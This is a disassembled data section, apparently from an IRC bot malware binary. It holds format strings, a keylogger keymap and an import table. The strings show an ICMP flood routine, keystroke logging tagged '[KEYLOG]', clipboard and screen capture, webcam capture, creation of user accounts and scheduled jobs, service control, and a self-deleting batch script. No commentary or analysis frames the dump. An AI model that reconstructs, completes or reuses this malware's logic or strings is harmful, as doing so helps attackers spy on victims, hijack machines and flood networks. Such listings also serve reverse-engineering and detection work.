aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_4075C7:loc_407989�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_4075C7+401�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
aS_6 db '<%s>',0 ; DATA XREF: sub_4075C7+413�o
align 4
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_4075C7+434�o
align 4
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_4075C7+471�o
align 4
aTrTdWidthDAH_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_4075C7+486�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
aSS_6 db '%s%s',0 ; DATA XREF: sub_4075C7+4CA�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_4075C7+511�o
align 4
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_4075C7:loc_407ADF�o
align 4
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_4075C7+561�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_4075C7+589�o
align 4
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_4075C7+618�o
align 4
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_4075C7+633�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 10h
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_4075C7+64E�o
align 4
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_407D34+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
aIcmpErrorSocke db '[ICMP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_407E55+49�o
aIcmpErrorSetso db '[ICMP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_407E55+C2�o
aIcmpInvalidTar db '[ICMP]: Invalid target IP.',0 ; DATA XREF: sub_407E55+12A�o
align 10h
aIcmpErrorSendi db '[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Return'
; DATA XREF: sub_407E55+307�o
db 'ed: <%d>.',0
align 4
aIcmpDoneWithSF db '[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/s'
; DATA XREF: sub_407E55+397�o
db 'ec (%dMB).',0
aIdentdClientCo db '[IDENTD]: Client connection from IP: %s:%d.',0
; DATA XREF: sub_40823C+BB�o
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: sub_40823C+113�o
aIdentdErrorSer db '[IDENTD]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_40823C+16E�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_40842D+F�o
align 4
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40842D+16�o
aS_7 db '%s',0 ; DATA XREF: sub_40842D+3B�o
align 10h
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_40842D+58�o
align 10h
dw 8
unicode 0, <>,0
aB: ; DATA XREF: sub_4085A9:loc_40868C�o
unicode 0, <b>,0
dd 62000000h, 2 dup(0)
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_439914 dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_4085A9+2B6�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
dword_43994C dd 5Ch ; DATA XREF: sub_4084C8+2C�o
dword_439950 dd 6261h ; DATA XREF: sub_4084C8+4E�o
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_4084C8+88�o
align 10h
aKeylogS db '[KEYLOG]: %s',0 ; DATA XREF: sub_4084C8+AE�o
align 10h
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_4085A9+8F�o
align 4
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_4085A9+1E5�o
align 4
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_4085A9+228�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_40888A+A�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_40888A+23�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_40888A+2B�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_40888A+38�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_40888A+45�o
align 4
aModule32first db 'Module32First',0 ; DATA XREF: sub_40888A+52�o
align 4
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_40888A+5F�o
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_40888A+6C�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_40888A+79�o
align 10h
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_40888A+86�o
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_40888A+93�o
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_40888A+A0�o
align 10h
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_40888A:loc_408992�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_40888A:loc_4089BF�o
align 4
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_40888A+14A�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_40888A+152�o
aIswindow db 'IsWindow',0 ; DATA XREF: sub_40888A+15F�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_40888A+16C�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_40888A+179�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_40888A+186�o
align 10h
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_40888A+193�o
align 10h
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_40888A+1A0�o
align 10h
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_40888A:loc_408A82�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_40888A+200�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_40888A+20D�o
align 10h
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_40888A+21A�o
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_40888A:loc_408AE9�o
align 4
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_40888A+270�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_40888A+278�o
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_40888A+285�o
align 4
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_40888A+292�o
align 4
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_40888A+29F�o
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_40888A+2AC�o
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_40888A:loc_408B7E�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_40888A+2FC�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_40888A+309�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_40888A:loc_408BC3�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_40888A+341�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_40888A+34E�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_40888A+35B�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_40888A+368�o
align 4
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_40888A+375�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_40888A+382�o
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_40888A+38F�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_40888A:loc_408C71�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_40888A:loc_408C99�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_40888A+420�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_40888A+428�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_40888A+435�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_40888A+442�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_40888A+44F�o
align 10h
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_40888A+45C�o
align 10h
aBitblt db 'BitBlt',0 ; DATA XREF: sub_40888A+469�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_40888A+476�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_40888A+483�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_40888A+4F6�o
align 10h
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_40888A+507�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_40888A+50F�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_40888A+51C�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_40888A+529�o
align 4
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_40888A+536�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_40888A+543�o
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_40888A+550�o
align 10h
aSocket db 'socket',0 ; DATA XREF: sub_40888A+55D�o
align 4
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_40888A+56A�o
aConnect db 'connect',0 ; DATA XREF: sub_40888A+577�o
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_40888A+584�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_40888A+591�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_40888A+59E�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_40888A+5AB�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_40888A+5B8�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_40888A+5C5�o
align 4
aSend db 'send',0 ; DATA XREF: sub_40888A+5D2�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_40888A+5DF�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_40888A+5EC�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_40888A+5F9�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_40888A+60B�o
align 10h
aSelect db 'select',0 ; DATA XREF: sub_40888A+613�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_40888A+620�o
align 10h
aAccept db 'accept',0 ; DATA XREF: sub_40888A+62D�o
align 4
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_40888A+63A�o
align 4
aGetsockname db 'getsockname',0 ; DATA XREF: sub_40888A+647�o
aGethostname db 'gethostname',0 ; DATA XREF: sub_40888A+654�o
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_40888A+661�o
align 4
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_40888A+66E�o
align 4
aGetpeername db 'getpeername',0 ; DATA XREF: sub_40888A+67B�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_40888A+688�o
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_40888A:loc_40904B�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_40888A+7D2�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_40888A+7DA�o
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_40888A+7E7�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_40888A+7F4�o
align 10h
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_40888A+801�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_40888A+80E�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_40888A+81B�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_40888A+828�o
align 4
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_40888A+835�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_40888A+842�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_40888A+8B4�o
align 10h
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_40888A:loc_40916B�o
align 4
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_40888A+8EE�o
align 4
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_40888A+8F6�o
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_40888A+903�o
align 4
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_40888A:loc_4091CA�o
align 4
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_40888A+951�o
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_40888A+959�o
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_40888A+966�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_40888A+973�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_40888A+980�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_40888A+98D�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_40888A+99A�o
align 4
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_40888A+9A7�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_40888A+9B4�o
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_40888A+9C1�o
align 10h
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_40888A+9CE�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_40888A:loc_4092D5�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_40888A+A58�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_40888A+A60�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_40888A:loc_40931F�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_40888A+AA2�o
align 4
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_40888A+AAA�o
align 10h
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_40888A:loc_409369�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_40888A+AEC�o
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_40888A+AF4�o
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_40888A+B01�o
align 4
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_40888A+B0E�o
align 10h
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_40888A:loc_4093DD�o
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_40888A+B60�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_40888A+B68�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_40888A:loc_409427�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_40888A+BAA�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_40888A+BB2�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_40888A+BBF�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_40888A+BCC�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_40888A+BD9�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_40888A+BE6�o
align 4
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_40888A:loc_4094C5�o
align 4
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_40888A+C48�o
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_40888A+C50�o
align 10h
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_409517+28�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_409517+5C�o
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_409517+90�o
align 10h
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_409517+C4�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_409517+F8�o
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_409517+12C�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_409517+160�o
align 4
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_409517+194�o
align 10h
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_409517+1C8�o
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_409517+1FC�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_409517+230�o
align 4
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_409517+264�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_409517+298�o
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_409517+2CC�o
align 4
aMainDllTestCom db '[MAIN]: DLL test complete.',0 ; DATA XREF: sub_409517+2F2�o
align 4
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_409AA0+72�o
align 4
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_409B65+5�o
align 4
aMirc_1 db 'mIRC',0 ; DATA XREF: sub_409B65+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_409BEA+1C�o
align 4
aSS_7 db '%s %s',0 ; DATA XREF: .text:00409CD0�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_409D0C+2�o
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_409D2E+48�o
align 4
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_409D2E+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_409D2E+140�o
align 10h
off_43A4D0 dd offset dword_43A524 ; DATA XREF: sub_409EB6+6D�r
; sub_40A29A+50�r ...
off_43A4D4 dd offset aAdded ; DATA XREF: sub_409EB6+2D�r
; sub_40A29A+82�r ...
; "Added"
dword_43A4D8 dd 0 ; DATA XREF: sub_409EB6+18�r
dd offset aDelete_1 ; "Delete"
dd offset aDeleted ; "Deleted"
align 8
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 10h
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 43A570h, 43A578h, 2, 43A580h, 43A58Ch, 3
dword_43A524 dd 646441h ; DATA XREF: .data:off_43A4D0�o
aAdded db 'Added',0 ; DATA XREF: .data:off_43A4D4�o
align 10h
aDelete_1 db 'Delete',0 ; DATA XREF: .data:0043A4DC�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .data:0043A4E0�o
aList_1 db 'List',0 ; DATA XREF: .data:0043A4E8�o
align 4
aListed db 'Listed',0 ; DATA XREF: .data:0043A4EC�o
align 10h
aStart_0 db 'Start',0 ; DATA XREF: .data:0043A4F4�o
align 4
aStarted db 'Started',0 ; DATA XREF: .data:0043A4F8�o
aStop_0 db 'Stop',0 ; DATA XREF: .data:0043A500�o
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:0043A504�o
aPause_0 db 'Pause',0
align 4
aPaused_0 db 'Paused',0
align 10h
aContinue_0 db 'Continue',0
align 4
aContinued db 'Continued',0
align 4
aNetSServiceS_ db '[NET]: %s service: ',27h,'%s',27h,'.',0 ; DATA XREF: sub_409EB6+38�o
align 4
aNetErrorWithSe db '[NET]: Error with service: ',27h,'%s',27h,'. %s',0
; DATA XREF: sub_409EB6+55�o
aNetSNoServiceS db '[NET]: %s: No service specified.',0 ; DATA XREF: sub_409EB6+74�o
align 4
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_409FDF:loc_40A0B8�o
align 4
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_409FDF:loc_40A039�o
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_409FDF+3C�o
align 10h
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_409FDF:loc_40A02F�o
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_409FDF:loc_40A043�o
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_409FDF:loc_40A08D�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_409FDF+8F�o
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_409FDF:loc_40A0BF�o
db 'marked for deletion.',0
align 4
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_409FDF:loc_40A0C6�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_409FDF:loc_40A0CD�o
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_409FDF:loc_40A0D4�o
align 10h
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_409FDF:loc_40A0DB�o
db ' correct access rights.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_409FDF:loc_40A0E2�o
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_409FDF:loc_40A078�o
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_409FDF:loc_40A07F�o
db 'tServiceCtrlDispatcher.',0
align 4
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_409FDF:loc_40A04D�o
db 'dependent on it.',0
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_409FDF:loc_40A025�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_409FDF:loc_40A086�o
db ' the service.',0
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_409FDF:loc_40A0E9�o
db 'the state of the service.',0
align 10h
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_409FDF:loc_40A0F0�o
align 4
